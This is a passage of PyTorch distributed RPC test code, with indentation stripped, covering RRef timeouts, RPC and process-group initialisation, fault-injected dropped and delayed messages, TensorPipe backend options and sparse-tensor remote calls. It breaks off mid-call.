@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# rpc_async returns immediately and surface a timeout through wait()
if rref_api == slow_rref.rpc_async:
result.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
@dist_init
def test_send_to_rank_sparse(self):
dst_rank = (self.rank + 1) % self.world_size
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
